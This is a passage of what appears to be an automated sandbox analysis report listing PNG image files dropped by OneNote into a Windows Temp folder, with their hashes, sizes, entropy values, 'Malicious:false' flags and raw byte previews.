                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{2FBCCBA1-D8A4-43D2-83FB-A8D0BD8356C1}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{2FD361B2-E684-49E2-8DD9-138874D6CF19}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{31691412-C4B1-4E11-8512-4F16F2B7C522}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{3262E7C4-F76F-44E6-B72B-960A3213F7BA}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{32D8922B-68A1-4907-BEAA-B4666EF704F0}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{330892B8-8505-42FA-A9CA-65CE78DCDB16}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{339A119B-A61F-4CE6-86DC-7F7435AC8355}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{34EE75E7-2C81-454F-A69A-E2B1D398162B}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{34FDF960-2679-4763-88E4-E101AC361780}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{350172AA-35DD-4782-A66E-CD61A5917AFF}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{35602FE3-0B77-47FA-916A-E755E1A2A2FF}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{38FA798D-FE7F-418B-8983-921644A9C458}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
